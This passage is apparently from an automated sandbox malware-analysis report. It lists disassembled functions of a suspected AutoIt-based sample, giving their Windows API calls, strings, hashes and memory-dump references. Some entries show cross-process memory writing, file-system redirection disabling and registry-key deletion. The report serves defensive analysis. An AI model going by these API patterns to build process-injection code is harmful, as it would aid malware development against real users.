                                                                  • Instruction ID: 59459253eb52dda562a3d2f5bba46ac4ae4126c40eb698d01a3d4a7610f12fed
                                                                  • Opcode Fuzzy Hash: 77e5d595b40604da0303d2d55d84d0bef48579b92a1b8828fee9f5471010e426
                                                                  • Instruction Fuzzy Hash: 54F062B2218304EFEB110FA5EC98E7B3BACFF89754F000026F949E6150CB619D81EA70
                                                                  Function 0094C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0094C1F7
                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 0094C20E
                                                                  • MessageBeep.USER32(00000000), ref: 0094C226
                                                                  • KillTimer.USER32(?,0000040A), ref: 0094C242
                                                                  • EndDialog.USER32(?,00000001), ref: 0094C25C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                  • String ID:
                                                                  • API String ID: 3741023627-0
                                                                  • Opcode ID: 2058f319e1a195700f2e9541282242c4102ffc302f038a2725f9d620535a0eb0
                                                                  • Instruction ID: 8620d259e8e8d66351c24ce359995a31974ff461b4bcab9f2608e3a70ea310e9
                                                                  • Opcode Fuzzy Hash: 2058f319e1a195700f2e9541282242c4102ffc302f038a2725f9d620535a0eb0
                                                                  • Instruction Fuzzy Hash: DE012671518308ABEB205B60EC4EFA677BCFF00B02F000669F556A00E0CBF4A8849B80
                                                                  Function 008F13B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • EndPath.GDI32(?), ref: 008F13BF
                                                                  • StrokeAndFillPath.GDI32(?,?,0092B888,00000000,?), ref: 008F13DB
                                                                  • SelectObject.GDI32(?,00000000), ref: 008F13EE
                                                                  • DeleteObject.GDI32 ref: 008F1401
                                                                  • StrokePath.GDI32(?), ref: 008F141C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                  • String ID:
                                                                  • API String ID: 2625713937-0
                                                                  • Opcode ID: 38f8a81a314bb5167621d10ea5252734670af3a589417c6e89675170e683c615
                                                                  • Instruction ID: 772f7ebcfc0c644f761bbd172413440edd6338b2bf452c89f0c71205bbf0a6e3
                                                                  • Opcode Fuzzy Hash: 38f8a81a314bb5167621d10ea5252734670af3a589417c6e89675170e683c615
                                                                  • Instruction Fuzzy Hash: 7EF01431028A08EBDB126F26EE5C7683BA5FB01336F098324E52DA81F1C7348995EF10
                                                                  Function 00902CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00910DB6: std::exception::exception.LIBCMT ref: 00910DEC
                                                                    • Part of subcall function 00910DB6: __CxxThrowException@8.LIBCMT ref: 00910E01
                                                                    • Part of subcall function 008F7DE1: _memmove.LIBCMT ref: 008F7E22
                                                                    • Part of subcall function 008F7A51: _memmove.LIBCMT ref: 008F7AAB
                                                                  • __swprintf.LIBCMT ref: 00902ECD
                                                                  Strings
                                                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00902D66
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                  • API String ID: 1943609520-557222456
                                                                  • Opcode ID: 7c271fc80b0ead8c388aff15fdbc3bf014d6bf53e9f6d379ea5a7706603450c6
                                                                  • Instruction ID: 2e5f6e02374ad79f214215973358e90f48ba77d1645cca24121462e070a70c78
                                                                  • Opcode Fuzzy Hash: 7c271fc80b0ead8c388aff15fdbc3bf014d6bf53e9f6d379ea5a7706603450c6
                                                                  • Instruction Fuzzy Hash: 27914B71208209AFDB14EF28D889D7EB7B9FF85710F00491DF595DB2A1DA60ED44CB52
                                                                  Function 0095B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 008F4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008F4743,?,?,008F37AE,?), ref: 008F4770
                                                                  • CoInitialize.OLE32(00000000), ref: 0095B9BB
                                                                  • CoCreateInstance.OLE32(00982D6C,00000000,00000001,00982BDC,?), ref: 0095B9D4
                                                                  • CoUninitialize.OLE32 ref: 0095B9F1
                                                                    • Part of subcall function 008F9837: __itow.LIBCMT ref: 008F9862
                                                                    • Part of subcall function 008F9837: __swprintf.LIBCMT ref: 008F98AC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                  • String ID: .lnk
                                                                  • API String ID: 2126378814-24824748
                                                                  • Opcode ID: b1eed559e40ced49c178693102d28a907aeebb77043a3d0507ce27128b90980e
                                                                  • Instruction ID: 601b74aeffbb8efbaab48070df2082c7c458b4447025c7c595c5fbc37099572f
                                                                  • Opcode Fuzzy Hash: b1eed559e40ced49c178693102d28a907aeebb77043a3d0507ce27128b90980e
                                                                  • Instruction Fuzzy Hash: 5EA18A756043059FCB00DF29C484E6ABBE5FF89314F148998F9999B3A1CB31EC49CB92
                                                                  Function 0091501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __startOneArgErrorHandling.LIBCMT ref: 009150AD
                                                                    • Part of subcall function 009200F0: __87except.LIBCMT ref: 0092012B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorHandling__87except__start
                                                                  • String ID: pow
                                                                  • API String ID: 2905807303-2276729525
                                                                  • Opcode ID: a549f649bb584b2a9331ed3e7300c3429ab67792770946b164657ba1af9e82b7
                                                                  • Instruction ID: 6ae217d5eeeddedfe4af5fbcf199e566d574d024c49c1df8e382c9159864f6ea
                                                                  • Opcode Fuzzy Hash: a549f649bb584b2a9331ed3e7300c3429ab67792770946b164657ba1af9e82b7
                                                                  • Instruction Fuzzy Hash: 99517D20B1C509D6DB117754E9013BE6B989BC0710F328D59E4D9863AFDE38CDD49782
                                                                  Function 00906192 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: _memset$_memmove
                                                                  • String ID: ERCP
                                                                  • API String ID: 2532777613-1384759551
                                                                  • Opcode ID: 70795588c1360819beb17460ff0a4a965a6b1284ed7ddf0f100674de62718cee
                                                                  • Instruction ID: e15badbc44bf7ee83dd3d394432d18bc7877c391ce83daaac525bcf268112539
                                                                  • Opcode Fuzzy Hash: 70795588c1360819beb17460ff0a4a965a6b1284ed7ddf0f100674de62718cee
                                                                  • Instruction Fuzzy Hash: 2051A271A00309DFDB24CF59C941BAAB7F8EF44304F20496EE55ADB291E774EA94CB80
                                                                  Function 009497F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 009514BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00949296,?,?,00000034,00000800,?,00000034), ref: 009514E6
                                                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0094983F
                                                                    • Part of subcall function 00951487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009492C5,?,?,00000800,?,00001073,00000000,?,?), ref: 009514B1
                                                                    • Part of subcall function 009513DE: GetWindowThreadProcessId.USER32(?,?), ref: 00951409
                                                                    • Part of subcall function 009513DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0094925A,00000034,?,?,00001004,00000000,00000000), ref: 00951419
                                                                    • Part of subcall function 009513DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0094925A,00000034,?,?,00001004,00000000,00000000), ref: 0095142F
                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009498AC
                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009498F9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                  • String ID: @
                                                                  • API String ID: 4150878124-2766056989
                                                                  • Opcode ID: ca547cfca4bbecb4b24a97f886ea31e1399b507be335ddb7649da3de8a524734
                                                                  • Instruction ID: 8b7823a480daabe2fc8c4da66e4e85314b9e888b3870b97603fdacaa07317c66
                                                                  • Opcode Fuzzy Hash: ca547cfca4bbecb4b24a97f886ea31e1399b507be335ddb7649da3de8a524734
                                                                  • Instruction Fuzzy Hash: 0A412A76900218AEDB10DFA4CC81FDEBBB8AB49740F004199FA45B7191DA716E89CBA0
                                                                  Function 00977946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0097F910,00000000,?,?,?,?), ref: 009779DF
                                                                  • GetWindowLongW.USER32 ref: 009779FC
                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00977A0C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Long
                                                                  • String ID: SysTreeView32
                                                                  • API String ID: 847901565-1698111956
                                                                  • Opcode ID: a28fec081e6d05194df565fc88f7733391cc9a0f01ca71baeed0d2bd4dd0ffa0
                                                                  • Instruction ID: 9cb7145087c1a942f4b220e526dcae3a81ce0f534a6a9dda90ea16adbfd3e72c
                                                                  • Opcode Fuzzy Hash: a28fec081e6d05194df565fc88f7733391cc9a0f01ca71baeed0d2bd4dd0ffa0
                                                                  • Instruction Fuzzy Hash: 2331B232205209ABDB158E78CC45BEAB7A9FB45334F208725F979E32E0D731E9519B50
                                                                  Function 009773D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00977461
                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00977475
                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00977499
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window
                                                                  • String ID: SysMonthCal32
                                                                  • API String ID: 2326795674-1439706946
                                                                  • Opcode ID: 204217bdb432d724f42644cb5b6f2687da076bd3eeeb114e75de664bf50e8ce5
                                                                  • Instruction ID: 0904207db468a6217612412d5a083d8451d0f7e9e58011f89a9211a3c20f5b79
                                                                  • Opcode Fuzzy Hash: 204217bdb432d724f42644cb5b6f2687da076bd3eeeb114e75de664bf50e8ce5
                                                                  • Instruction Fuzzy Hash: 9D219433614218ABDF118F94CC46FEA7B6AFF48724F114114FE196B1E0DA75AC51DBA0
                                                                  Function 00977B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00977C4A
                                                                  • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00977C58
                                                                  • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00977C5F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$DestroyWindow
                                                                  • String ID: msctls_updown32
                                                                  • API String ID: 4014797782-2298589950
                                                                  • Opcode ID: e5989fcd8c8123ed86db9fd47e9902689d313c9da1958359310228c75cc3e950
                                                                  • Instruction ID: 297a0a273b0f1aa20b3f0d200ff840df3ee1e3fb17d449ed5b0dffbe7b9cc19d
                                                                  • Opcode Fuzzy Hash: e5989fcd8c8123ed86db9fd47e9902689d313c9da1958359310228c75cc3e950
                                                                  • Instruction Fuzzy Hash: A421AEB2204208AFDB11DF68DCC1DA677ECEF5A364B154018FA089B3A1CB31EC018AA0
                                                                  Function 00976CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00976D3B
                                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00976D4B
                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00976D70
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$MoveWindow
                                                                  • String ID: Listbox
                                                                  • API String ID: 3315199576-2633736733
                                                                  • Opcode ID: 958b32dc56288b5cec32d68f55ef19fce7b75ee8ff6e67f990cabbfa9cb9f600
                                                                  • Instruction ID: 7cf202a3eeac745319634ab728e350edb80dcfd50c0a249de953e016f845fb4f
                                                                  • Opcode Fuzzy Hash: 958b32dc56288b5cec32d68f55ef19fce7b75ee8ff6e67f990cabbfa9cb9f600
                                                                  • Instruction Fuzzy Hash: 77217F33610118AFDF228F54CC45FAB3BBEEB89764F018124FA499B1A0CA719C519BA0
                                                                  Function 0097770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00977772
                                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00977787
                                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00977794
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: msctls_trackbar32
                                                                  • API String ID: 3850602802-1010561917
                                                                  • Opcode ID: f3184d41c208bbbc6a936f3df294cbb3975dd4916205b61c7feda370d3ebc4f3
                                                                  • Instruction ID: 37c3044d17d67e959a4f22ff80cd368db034de7e7bd68c45ff7eefce687bd7b1
                                                                  • Opcode Fuzzy Hash: f3184d41c208bbbc6a936f3df294cbb3975dd4916205b61c7feda370d3ebc4f3
                                                                  • Instruction Fuzzy Hash: C7112732204208BFEF145FA4CC05FE7776CEF88B54F028118F749A6090C671E811DB20
                                                                  Function 008F4C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,008F4BD0,?,008F4DEF,?,009B52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 008F4C11
                                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 008F4C23
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                  • API String ID: 2574300362-3689287502
                                                                  • Opcode ID: 6ae795350daf2146e660b0ad069f0cbf453cd9c45b71af3dca37dba41c0cfb7a
                                                                  • Instruction ID: b63f85e2e906a272f3fe8e4b5b961fd94103844d98e49f273c909ff8b71e3210
                                                                  • Opcode Fuzzy Hash: 6ae795350daf2146e660b0ad069f0cbf453cd9c45b71af3dca37dba41c0cfb7a
                                                                  • Instruction Fuzzy Hash: CFD0C231514713CFC7209F70C818207B6D5EF09341F01DC3A9589E2150E6B0C4C0CA60
                                                                  Function 008F4C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,008F4B83,?), ref: 008F4C44
                                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 008F4C56
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                  • API String ID: 2574300362-1355242751
                                                                  • Opcode ID: 4df614254538f5c9759ca79ee6b2a4da0f04f871e83b0246a9a24940c0946328
                                                                  • Instruction ID: 446eeee0fd05919122d57d3b865fff0d6ddcbede87bdc68f58f4d77acce69410
                                                                  • Opcode Fuzzy Hash: 4df614254538f5c9759ca79ee6b2a4da0f04f871e83b0246a9a24940c0946328
                                                                  • Instruction Fuzzy Hash: 2BD0C732A28713CFC7208F31C81821A73E4EF01340F11E83AA59AE6160FA70C8C0CA50
                                                                  Function 00970DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,00971039), ref: 00970DF5
                                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00970E07
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
